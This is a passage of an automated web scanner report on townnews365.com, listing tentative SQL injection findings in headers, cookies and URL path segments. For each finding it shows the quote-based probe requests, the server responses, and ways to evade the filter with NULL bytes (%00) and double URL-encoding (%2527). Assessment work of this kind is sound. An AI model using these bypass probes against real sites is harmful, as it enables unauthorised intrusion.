The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /content/tncms/live/global/resources/images/_images/login1.jpg HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/user-generated_solutions/user_account_contributions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24%00'
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.3.10.1305412213

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content/tncms/live/global/resources/images/_images/login1.jpg HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/user-generated_solutions/user_account_contributions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24%00''
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.3.10.1305412213

Response 2

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=600
Content-Type: image/jpeg
Date: Sat, 14 May 2011 22:42:23 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "663542433"
Last-Modified: Wed, 08 Dec 2010 18:14:04 GMT
Real-Hostname: townnews365.com
Content-Length: 129874
Connection: Keep-Alive
X-Cache-Info: cached

......JFIF.....d.d......Ducky.......Z......Adobe.d...................................................................................................................................................X..
...[SNIP]...

2.24. http://www.townnews365.com/content/tncms/live/global/resources/images/_images/login2.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content/tncms/live/global/resources/images/_images/login2.jpg

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /content/tncms/live/global%2527/resources/images/_images/login2.jpg HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/user-generated_solutions/user_account_contributions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.3.10.1305412213

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content/tncms/live/global%2527%2527/resources/images/_images/login2.jpg HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/user-generated_solutions/user_account_contributions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.3.10.1305412213

Response 2

HTTP/1.1 404 Not Found
Server: WWW
Cache-Control: public, max-age=600
Content-Type: text/html
Date: Sat, 14 May 2011 22:44:18 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
Real-Hostname: townnews365.com
Content-Length: 680
Connection: Keep-Alive
X-Cache-Info: cached

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

2.25. http://www.townnews365.com/content/tncms/live/global/resources/images/_images/login2.jpg [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content/tncms/live/global/resources/images/_images/login2.jpg

Issue detail

The REST URL parameter 8 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 8, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /content/tncms/live/global/resources/images/_images/login2.jpg%00' HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/user-generated_solutions/user_account_contributions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.3.10.1305412213

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content/tncms/live/global/resources/images/_images/login2.jpg%00'' HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/user-generated_solutions/user_account_contributions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.3.10.1305412213

Response 2

HTTP/1.1 404 Not Found
Server: WWW
Cache-Control: public, max-age=600
Content-Type: text/html
Date: Sat, 14 May 2011 22:44:51 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
X-Cache-Info: caching
Real-Hostname: townnews365.com
Content-Length: 680

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

2.26. http://www.townnews365.com/content/tncms/live/global/resources/images/_images/login2.jpg [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content/tncms/live/global/resources/images/_images/login2.jpg

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /content/tncms/live/global/resources/images/_images/login2.jpg HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%00'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.3.10.1305412213

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content/tncms/live/global/resources/images/_images/login2.jpg HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%00''
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.3.10.1305412213

Response 2

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=600
Content-Type: image/jpeg
Date: Sat, 14 May 2011 22:42:23 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1931070189"
Last-Modified: Wed, 08 Dec 2010 18:14:04 GMT
Real-Hostname: townnews365.com
Content-Length: 80236
Connection: Keep-Alive
X-Cache-Info: cached

......JFIF.....d.d......Ducky.......Z......Adobe.d...................................................................................................................................................X..
...[SNIP]...

2.27. http://www.townnews365.com/content/tncms/live/global/resources/images/_images/login2.jpg [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content/tncms/live/global/resources/images/_images/login2.jpg

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /content/tncms/live/global/resources/images/_images/login2.jpg HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/user-generated_solutions/user_account_contributions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751'; __utmb=121545751.3.10.1305412213

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content/tncms/live/global/resources/images/_images/login2.jpg HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/user-generated_solutions/user_account_contributions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751''; __utmb=121545751.3.10.1305412213

Response 2

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=600
Content-Type: image/jpeg
Date: Sat, 14 May 2011 22:42:23 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1931070189"
Last-Modified: Wed, 08 Dec 2010 18:14:04 GMT
Real-Hostname: townnews365.com
Content-Length: 80236
Connection: Keep-Alive
X-Cache-Info: cached

......JFIF.....d.d......Ducky.......Z......Adobe.d...................................................................................................................................................X..
...[SNIP]...

2.28. http://www.townnews365.com/content/tncms/live/global/resources/images/_images/usercontrib1.jpg [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content/tncms/live/global/resources/images/_images/usercontrib1.jpg

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /content/tncms/live/global/resources/images/_images/usercontrib1.jpg HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.3.10.1305412213

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content/tncms/live/global/resources/images/_images/usercontrib1.jpg HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=''
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.3.10.1305412213

Response 2

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=600
Content-Type: image/jpeg
Date: Sat, 14 May 2011 22:42:24 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "661283329"
Last-Modified: Wed, 08 Dec 2010 18:14:03 GMT
Real-Hostname: townnews365.com
Content-Length: 127591
Connection: Keep-Alive
X-Cache-Info: cached

......JFIF.....d.d......Ducky.......Z......Adobe.d...................................................................................................................................................X..
...[SNIP]...

2.29. http://www.townnews365.com/content/tncms/live/global/resources/images/_images/usercontrib2.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content/tncms/live/global/resources/images/_images/usercontrib2.jpg

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /content/tncms/live/global%2527/resources/images/_images/usercontrib2.jpg HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/user-generated_solutions/user_account_contributions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.3.10.1305412213

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content/tncms/live/global%2527%2527/resources/images/_images/usercontrib2.jpg HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/user-generated_solutions/user_account_contributions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.3.10.1305412213

Response 2

HTTP/1.1 404 Not Found
Server: WWW
Cache-Control: public, max-age=600
Content-Type: text/html
Date: Sat, 14 May 2011 22:44:40 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
X-Cache-Info: caching
Real-Hostname: townnews365.com
Content-Length: 680

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

2.30. http://www.townnews365.com/content/tncms/live/global/resources/images/_images/usercontrib2.jpg [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content/tncms/live/global/resources/images/_images/usercontrib2.jpg

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /content/tncms/live/global/resources/images/_images/usercontrib2.jpg?1'=1 HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/user-generated_solutions/user_account_contributions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.3.10.1305412213

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content/tncms/live/global/resources/images/_images/usercontrib2.jpg?1''=1 HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/user-generated_solutions/user_account_contributions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.3.10.1305412213

Response 2

HTTP/1.1 417 Cache busting detected
Content-Type: text/html
Date: Sat, 14 May 2011 22:43:44 GMT
Connection: Keep-Alive
Content-Length: 26

417 Cache busting detected

2.31. http://www.townnews365.com/content/tncms/live/global/resources/images/icon-05.gif [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content/tncms/live/global/resources/images/icon-05.gif

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /content/tncms/live/global/resources/images/icon-05.gif HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://townnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%00'; __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.1.10.1305412213

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content/tncms/live/global/resources/images/icon-05.gif HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://townnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)%00''; __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.1.10.1305412213

Response 2

HTTP/1.1 200 OK
Server: WWW
Cache-Control: public, max-age=600
Content-Type: image/gif
Date: Sat, 14 May 2011 22:37:35 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1696493"
Last-Modified: Wed, 08 Dec 2010 18:13:45 GMT
Real-Hostname: townnews365.com
Content-Length: 296
Connection: Keep-Alive
X-Cache-Info: cached

GIF89a
.
.."............................................................................................................................................................................................
...[SNIP]...

2.32. http://www.townnews365.com/content/tncms/live/global/resources/images/icon-05.gif [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content/tncms/live/global/resources/images/icon-05.gif

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /content/tncms/live/global/resources/images/icon-05.gif?1'=1 HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://townnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.1.10.1305412213

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content/tncms/live/global/resources/images/icon-05.gif?1''=1 HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://townnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.1.10.1305412213

Response 2

HTTP/1.1 417 Cache busting detected
Content-Type: text/html
Date: Sat, 14 May 2011 22:43:24 GMT
Connection: Keep-Alive
Content-Length: 26

417 Cache busting detected

2.33. http://www.townnews365.com/content/tncms/live/user/user_admin-core-base/resources/images/user_70.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /content/tncms/live/user/user_admin-core-base/resources/images/user_70.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /content/tncms/live%2527/user/user_admin-core-base/resources/images/user_70.png HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/users/login/?referer_url=/user-generated_solutions/user_account_contributions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.4.10.1305412213

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /content/tncms/live%2527%2527/user/user_admin-core-base/resources/images/user_70.png HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/users/login/?referer_url=/user-generated_solutions/user_account_contributions/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.4.10.1305412213

